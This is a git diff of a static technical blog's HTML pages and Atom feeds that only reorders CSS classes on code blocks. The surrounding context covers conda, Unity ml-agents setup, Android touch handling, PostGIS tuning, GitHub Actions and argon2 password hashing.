    conda env export > environment.yml
     

    Similarly, if you colleague sends you their "environment file", the command to reproduce their environment is (Please note that the name of the environment is encoded within the first line of the .yml file):

    -
    1
    conda env create -f environment.yml
    +
    1
    conda env create -f environment.yml
     

    In summary, Anaconda can be used to easily manage packages and dependencies across a project and fast track test/bug reproduction across multiple machines seamlessly. Personally, I would always advise to use a package manager across projects no matter the size.

    diff --git a/episode-9-web-enabled-universal-remote-part-1.html b/episode-9-web-enabled-universal-remote-part-1.html index 27fbbd6c..7a31d570 100644 --- a/episode-9-web-enabled-universal-remote-part-1.html +++ b/episode-9-web-enabled-universal-remote-part-1.html @@ -170,7 +170,7 @@

    Episode 9 - Web Enabled U

    Now before connecting the entire circuit together, one should always test that components work in an expected way. To achieve this for the infrared receiver, a basic program to interface between the receiver and the microcontroller is needed.

    For a basic test, an LED would light up whenever the infrared is receiving a signal. By following the circuit diagram with the corresponding code for the NodeMCU, this test for the receiver should be reproduce-able at home, please note that for other infrared receivers you will need to check the pin outs.

    Fritzing_FEKX395tbZ.png

    -
     1
    +
     1
      2
      3
      4
    diff --git a/feeds/all.atom.xml b/feeds/all.atom.xml
    index f352e9a3..30b23bda 100644
    --- a/feeds/all.atom.xml
    +++ b/feeds/all.atom.xml
    @@ -8,21 +8,21 @@
     <p>Miniconda was set up through the installation instructions listed on the website for Miniconda3 macOS Apple M1 64-bit pkg:</p>
     <p><a href="https://docs.conda.io/en/latest/miniconda.html">https://docs.conda.io/en/latest/miniconda.html</a></p>
     <p>Following this, the conda-forge is added as a channel (instructions from <a href="https://conda-forge.org/docs/user/introduction.html">https://conda-forge.org/docs/user/introduction.html</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda config --add channels conda-forge
     conda config --set channel_priority strict
     </code></pre></div>
     </td></tr></tbody></table>
     <h2 id="conda-environment">Conda environment</h2>
     <p>Big thank you to this github thread (and user @automata) for finally leading me down a successful path <a href="https://github.com/Unity-Technologies/ml-agents/issues/5797">https://github.com/Unity-Technologies/ml-agents/issues/5797</a>:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
     <p>Ensure to download the release specifically that you are targetting which are managed by branches on the repo. IE <a href="https://github.com/Unity-Technologies/ml-agents/tree/latest_release">https://github.com/Unity-Technologies/ml-agents/tree/latest_release</a>. If you are using the gh CLI <code>gh repo clone Unity-Technologies/ml-agents -- --branch release_20</code></p>
     </blockquote>
     <p>Next we need to edit <code>setup.py</code> found in <code>ml-agents-release_20/ml-agents/setup.py</code>, specifically line 71 to:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now we install the ml-agents package (which has a dependancy of torch) through the locally edited version:</p>
    @@ -30,7 +30,7 @@ conda config --set channel_priority strict
     <p>Theoretically, this is where we should've been done and been able to run <code>mlagents-learn</code> without any more problems, but that wasn't the case. The next error we run into is:</p>
     <p><code>TypeError: Descriptors cannot not be created directly.</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly">https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
    @@ -42,7 +42,7 @@ conda config --set channel_priority strict
     </blockquote>
     <p><code>ImportError: dlopen(/Users/jackmckew/miniconda3/envs/mlagentstest/lib/python3.10/site-packages/grpc/_cython/cygrpc.cpython-310-darwin.so, 0x0002): symbol not found in flat namespace '_CFRelease'</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app">https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip uninstall grpcio -y
     conda install grpcio -y
     </code></pre></div>
    @@ -52,7 +52,7 @@ conda install grpcio -y
     <p>Finally we can run:</p>
     <p><code>mlagents-learn</code></p>
     <p>To be met with this glorious screen</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/android.atom.xml b/feeds/android.atom.xml
    index ae21ca13..39df15ca 100644
    --- a/feeds/android.atom.xml
    +++ b/feeds/android.atom.xml
    @@ -1,7 +1,7 @@
     
     Jack McKew's Blog - Androidhttps://jackmckew.dev/2018-12-21T01:30:00+11:00Engineer | Software Developer | Data ScientistEpisode 5 - Android Multi-Touch2018-12-21T01:30:00+11:002018-12-21T01:30:00+11:00Jack McKewtag:jackmckew.dev,2018-12-21:/episode-5-android-multi-touch.html<body><p>This week's episode of Code Fridays will go into detail on how to handle multi-touch inputs within Android. Firstly to handle the location on where the screen in being touched we need to create a class to handle the interaction. By creating a public class like Finger.java as can …</p></body><body><p>This week's episode of Code Fridays will go into detail on how to handle multi-touch inputs within Android. Firstly to handle the location on where the screen in being touched we need to create a class to handle the interaction. By creating a public class like Finger.java as can be seen below it contains 3 values: x_pos, y_pos and id. It is also useful to create a constructor so that other classes can easily construct the Finger class.</p>
     <p><img alt="ezgif.com-video-to-gif-2" class="img-fluid" src="https://jackmckew.dev/img/ezgif.com-video-to-gif-2.gif"/></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -31,7 +31,7 @@
     <p>Now that we have a class to store our details on how each finger is touching the screen, we now need to interact with some base level Java. Firstly we need to extend a view within the Android application so that the application knows what boundaries to deal, in my test application, I've just used the entire screen as a view.</p>
     <p>After that an array is needed to store the data of multiple inputs touching the screen. I've used a TreeMap in this example as this allows for ease later on so that they are in order on how they were input, however this comes with a downside to this example as lifting a input in the middle of the order touched crashes the array, this will be fixed in a later episode.</p>
     <p>A paint is initialized for both the stroke paint for drawing lines between the touches and a paint for the text that is to come. Generic constructors for the view are also listed below.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -97,7 +97,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now that everything is initialized and ready to draw some graphics on the screen so that the application is interactive, now we have to interface with touch events. This is done by creating a new function within our View class, that takes in a MotionEvent on the View so that we can detect different types of touch events. Documentation on this can be found (<a href="https://developer.android.com/training/graphics/opengl/touch#java">https://developer.android.com/training/graphics/opengl/touch#java</a>).</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -208,7 +208,7 @@
     </td></tr></tbody></table>
     <p>Now that we've created a new Finger class inside our TreeMap by the order that the screen is touched in and we're removing that class when the screen input has been released, we are now ready to draw on the screen from our inputs.</p>
     <p>By iterating through the TreeMap, in each loop we know what the previous and what the next value in the array we can draw a circle for where the input is and a line between. This also allows us to determine whereabouts is the point in between these two points so we can write text. For this example, I've chosen to write the length of the distance between the two inputs to demonstrate that this can also be dynamic in nature.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/book-reviews.atom.xml b/feeds/book-reviews.atom.xml
    index bbc2aa15..6ba1f255 100644
    --- a/feeds/book-reviews.atom.xml
    +++ b/feeds/book-reviews.atom.xml
    @@ -58,7 +58,7 @@
     <h2 id="crash-early">Crash Early</h2>
     <p>By crashing early, it means the program does a lot less damage than a crippled program. This concept can be implemented by checking for the inverse of the requirement and erroring. By doing this, it means the code is more readable in finding the requirements that it must meet. It captures more potential issues before they cause damage versus checking all the ducks are lined up.</p>
     <p>For demonstrating this, we will use the example of a square root function. As we know, square root wants to have a positive number given to it (unless using complex numbers).</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    diff --git a/feeds/cicd.atom.xml b/feeds/cicd.atom.xml
    index 73c7a73a..05db22a2 100644
    --- a/feeds/cicd.atom.xml
    +++ b/feeds/cicd.atom.xml
    @@ -60,7 +60,7 @@
     <h2 id="publish-to-marketplace">Publish to Marketplace</h2>
     <p>Once you've implemented these few files, you should get a warning at the top of the repository on GitHub hinting if you want to publish this on the marketplace. This is done smoothly with creating a release of your project, and that's it, done!</p>
     <p>Now users can intergrate your action into the CI/CD pipeline as easily as:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="p p-Indicator">-</span> <span class="nt">name</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">Python Interrogate Check</span>
       <span class="nt">uses</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">JackMcKew/python-interrogate-check@v0.1.1</span>
     </code></pre></div>
    @@ -87,7 +87,7 @@
     <h1 id="action-format-yaml">Action Format (.yaml)</h1>
     <p>A Github Action is defined with a <code>&lt;action_name&gt;.yaml</code> file which must be placed within <code>.github/workflows</code> from the base of the repository. As many actions as you want can be placed in this folder, and will subsequently run when triggered.</p>
     <p>The base structure of a <code>link_checker.yaml</code> file is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -162,7 +162,7 @@
     <p>Fork repository &gt; Make changes &gt; Submit Pull Request with changes &gt; Check changes &gt; Merge into repository</p>
     </blockquote>
     <p>When the action was first set up for actions to run on pull requests, it kept throwing an error:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>The process <span class="s1">'/usr/bin/git'</span> failed with <span class="nb">exit</span> code <span class="m">1</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>The process <span class="s1">'/usr/bin/git'</span> failed with <span class="nb">exit</span> code <span class="m">1</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>This was determined to be intentional design by Github as a mitigation against the possibility that a bad actor could open PRs against your repo and do things like list out secrets or just run up a large bill (once we start charging) on your account.</p>
    @@ -180,7 +180,7 @@
     <blockquote>
     <p>Ensure to use <code>if: steps.prcomm.outputs.BOOL_TRIGGERED == 'true'</code> in all subsequent jobs you want triggered if the phrase is found, otherwise the action will become recursive: check for comment, run checks, make a comment, check for comment, etc</p>
     </blockquote>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/data-science.atom.xml b/feeds/data-science.atom.xml
    index f07ebd99..f0ee43d7 100644
    --- a/feeds/data-science.atom.xml
    +++ b/feeds/data-science.atom.xml
    @@ -8,21 +8,21 @@
     <p>Miniconda was set up through the installation instructions listed on the website for Miniconda3 macOS Apple M1 64-bit pkg:</p>
     <p><a href="https://docs.conda.io/en/latest/miniconda.html">https://docs.conda.io/en/latest/miniconda.html</a></p>
     <p>Following this, the conda-forge is added as a channel (instructions from <a href="https://conda-forge.org/docs/user/introduction.html">https://conda-forge.org/docs/user/introduction.html</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda config --add channels conda-forge
     conda config --set channel_priority strict
     </code></pre></div>
     </td></tr></tbody></table>
     <h2 id="conda-environment">Conda environment</h2>
     <p>Big thank you to this github thread (and user @automata) for finally leading me down a successful path <a href="https://github.com/Unity-Technologies/ml-agents/issues/5797">https://github.com/Unity-Technologies/ml-agents/issues/5797</a>:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
     <p>Ensure to download the release specifically that you are targetting which are managed by branches on the repo. IE <a href="https://github.com/Unity-Technologies/ml-agents/tree/latest_release">https://github.com/Unity-Technologies/ml-agents/tree/latest_release</a>. If you are using the gh CLI <code>gh repo clone Unity-Technologies/ml-agents -- --branch release_20</code></p>
     </blockquote>
     <p>Next we need to edit <code>setup.py</code> found in <code>ml-agents-release_20/ml-agents/setup.py</code>, specifically line 71 to:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now we install the ml-agents package (which has a dependancy of torch) through the locally edited version:</p>
    @@ -30,7 +30,7 @@ conda config --set channel_priority strict
     <p>Theoretically, this is where we should've been done and been able to run <code>mlagents-learn</code> without any more problems, but that wasn't the case. The next error we run into is:</p>
     <p><code>TypeError: Descriptors cannot not be created directly.</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly">https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
    @@ -42,7 +42,7 @@ conda config --set channel_priority strict
     </blockquote>
     <p><code>ImportError: dlopen(/Users/jackmckew/miniconda3/envs/mlagentstest/lib/python3.10/site-packages/grpc/_cython/cygrpc.cpython-310-darwin.so, 0x0002): symbol not found in flat namespace '_CFRelease'</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app">https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip uninstall grpcio -y
     conda install grpcio -y
     </code></pre></div>
    @@ -52,7 +52,7 @@ conda install grpcio -y
     <p>Finally we can run:</p>
     <p><code>mlagents-learn</code></p>
     <p>To be met with this glorious screen</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/data-visualisation.atom.xml b/feeds/data-visualisation.atom.xml
    index 812c5e08..6441a682 100644
    --- a/feeds/data-visualisation.atom.xml
    +++ b/feeds/data-visualisation.atom.xml
    @@ -4,7 +4,7 @@
     <p>Next in the <code>draw</code> function, which is repeatedly called while the browser has the page open, we loop through all the objects in the array and draw a circle (ellipse with equal radii) and colour it according to how big it's radius is (this is as to watch it fade as it grows). We make use of the <code>stroke</code> function to define the colour of the lines for what we'll be drawing in that instance. If a drop has become too big we remove it from the array and add a new random drop, if it's still undersize we increase it's radius and colour.</p>
     <p>Finally to add interactivity, we make use of the <code>mouseIsPressed</code> variable to determine if the user has clicked on the visualization and add a drop into the array at the X &amp; Y position of where the user clicked.</p>
     <p align="center"><iframe frameborder="0" height="400" src="https://editor.p5js.org/JackMcKew/embed/u2ga-k6rk" width="100%"></iframe></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/databases.atom.xml b/feeds/databases.atom.xml
    index c1c815cd..4fb77cfa 100644
    --- a/feeds/databases.atom.xml
    +++ b/feeds/databases.atom.xml
    @@ -10,7 +10,7 @@
     <p><code>ogr2ogr -f "PostgreSQL" PG:"dbname=postgres user=postgres password=root host=localhost" "water_polygons.shp" -progress -overwrite -nlt PROMOTE_TO_MULTI -nln water</code></p>
     <h2 id="generate-points">Generate points</h2>
     <p>Now that we have our polygons loaded into a table, we need to generate points to be evaluated:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -25,7 +25,7 @@
     </td></tr></tbody></table>
     <h2 id="baseline-test">Baseline test</h2>
     <p>Our baseline test of a point in polygon spatial join: count how many points are within each polygon, can demonstrate the effectiveness of indexing, point in polygon calculations and general overhead. By using the <code>EXPLAIN ANALYZE</code> operator in PostgreSQL, we can look into the inner workings of how the database plans and executes the query, along with how long the query took. We'll also take only 50% of the points as querying the entire table defeats the purpose of this task.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -39,7 +39,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>By running without any of the following optimizations, we get the result of:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -75,7 +75,7 @@
     <h1 id="optimize-techniques">Optimize Techniques</h1>
     <h2 id="set-the-page-size">Set the page size</h2>
     <p>Kudos to Paul Ramsey <a href="http://blog.cleverelephant.ca/2018/09/postgis-external-storage.html">source</a> for demonstrating the effectiveness of setting the page size for postgresql (and by extension PostGIS). As the default for postgresql is to use a set amount of page size of internal memory, this results in the database only allowed to use a set amount of memory to process queries which inherently does not leverage the computing power that we have on our machines. By allowing postgresql to use external memory, this not only leverages the memory available but should also improve our query performance.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -89,7 +89,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>By running the baseline test again:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -131,11 +131,11 @@
     </blockquote>
     <h2 id="create-a-spatial-index">Create a spatial index</h2>
     <p>One technique that should always be used in databases is indexing, especially for geospatial databases. Creating an index on our database is as simple as:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">INDEX</span> <span class="n">geometry_index</span> <span class="k">ON</span> <span class="n">water</span> <span class="k">USING</span> <span class="n">GIST</span><span class="p">(</span><span class="n">wkb_geometry</span><span class="p">);</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">INDEX</span> <span class="n">geometry_index</span> <span class="k">ON</span> <span class="n">water</span> <span class="k">USING</span> <span class="n">GIST</span><span class="p">(</span><span class="n">wkb_geometry</span><span class="p">);</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>This works by computing the bounding box of each geometry in the dataset, and whenever a query comes in that wishes to evaluate against the geometries (ie, intersection), the query resolver will first reduce the query only to geometries which bounding box first passes the query before continuing to include the entire geometry.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/engineering.atom.xml b/feeds/engineering.atom.xml
    index db93ebcd..35d2b554 100644
    --- a/feeds/engineering.atom.xml
    +++ b/feeds/engineering.atom.xml
    @@ -65,11 +65,11 @@
     </ol>
     <p>From this, we will use the argon2 hashing algorithm. As normal, it is best practice to set up a virtual environment (or conda environment) and install the dependencies, in this case passlib.</p>
     <p>First of all, import the hashing algorithm you wish to use from the passlib package:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">passlib.hash</span> <span class="kn">import</span> <span class="n">argon2</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">passlib.hash</span> <span class="kn">import</span> <span class="n">argon2</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Following importing the hashing algorithm, to hash the password in our case is very simple and we can have a peak at what the output hash looks like:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">hash</span> <span class="o">=</span> <span class="n">argon2</span><span class="o">.</span><span class="n">hash</span><span class="p">(</span><span class="s2">"super_secret_password"</span><span class="p">)</span>
     
    @@ -88,7 +88,7 @@
     <li>\$mvLTquN71JPjuC+S9QNXYA - the base64-encoded hashed password (derived key), using standard base64 encoding and no padding.</li>
     </ul>
     <p>If we run this again, we can check that the outputs are completely different due to the randomly generated salt.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">hash</span> <span class="o">=</span> <span class="n">argon2</span><span class="o">.</span><span class="n">hash</span><span class="p">(</span><span class="s2">"super_secret_password"</span><span class="p">)</span>
     
    @@ -100,14 +100,14 @@
     </blockquote>
     <p>Now that we've generated our new passwords, stored them away in a secure database somewhere, using a secure method of communication somehow, our user wants to login with the password they signed up with ("super_secret_password") and we have to check if this is the correct password.</p>
     <p>To do this with passlib, it is as simply as calling the .verify function with the plaintext and the equivalent hash which will return a boolean value determining whether of not the password is correct or not.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="n">argon2</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="s2">"super_secret_password"</span><span class="p">,</span><span class="nb">hash</span><span class="p">))</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="n">argon2</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="s2">"super_secret_password"</span><span class="p">,</span><span class="nb">hash</span><span class="p">))</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
     <p>True</p>
     </blockquote>
     <p>Hooray! Our password verification system works, now we would like to check that if the user inputs a incorrect password that our algorithm returns correctly (false).</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="n">argon2</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="s2">"user_name"</span><span class="p">,</span><span class="nb">hash</span><span class="p">))</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="n">argon2</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="s2">"user_name"</span><span class="p">,</span><span class="nb">hash</span><span class="p">))</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
    diff --git a/feeds/excel.atom.xml b/feeds/excel.atom.xml
    index 26ae6566..14c936f7 100644
    --- a/feeds/excel.atom.xml
    +++ b/feeds/excel.atom.xml
    @@ -89,7 +89,7 @@
     <p>After researching the internet when I came across this problem, I stumbled across a similar question on Stackoverflow:</p>
     <p><a href="https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1">https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1</a></p>
     <p>With one of the answers from <a href="https://stackoverflow.com/users/445425/chris-neilsen">Chris Neilsen</a> being:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -158,7 +158,7 @@
     <li><code>iCol</code> - The column index we want to return</li>
     </ul>
     <p>Without further ado, here is the function. Note that another function <code>GetListObject</code> is used to find the table in question see <a href="#getlistobject-function">GetListObject Function</a> for more information on this. Otherwise you can use <code>Application.Worksheets(sheetName)</code>.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -208,7 +208,7 @@
     <h2 id="getlistobject-function">GetListObject Function</h2>
     <p>Similarly, the GetListObject function was also found on Stackoverflow, by the user <a href="https://stackoverflow.com/users/20151/andrewd">AndrewD</a>:</p>
     <p><a href="https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba">https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
